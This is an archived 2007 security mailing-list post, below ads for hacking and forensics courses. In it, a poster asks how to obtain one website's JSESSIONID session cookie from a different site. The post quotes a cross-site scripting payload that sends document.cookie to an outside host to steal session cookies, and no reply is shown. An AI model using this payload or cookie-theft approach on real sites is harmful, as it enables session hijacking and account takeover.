Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Security-Basics
[Top] [All Lists]

Getting cookies

Subject: Getting cookies
Date: Wed, 24 Jan 2007 09:23:57 +0530
Hi

I am trying to do the application security of a web site. Apart from that, i
am trying to learn how things work actually. Kindly help me.

Let's say two sites are opened in IE. I would like to get the cookies of
Site A after opening a page in Site B.

Please let me know how to get the JSESSIONID value of the web site from
another totally different web site.

I know the way to get the cookies of a page from cross site scripting of the
page through

<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'
+document.cookie;</script>

but dont know how to get cookies of one site from another site...

Is this possible?

Kindly let me know

-thanks 'n' regards
Mac

<Prev in Thread] Current Thread [Next in Thread>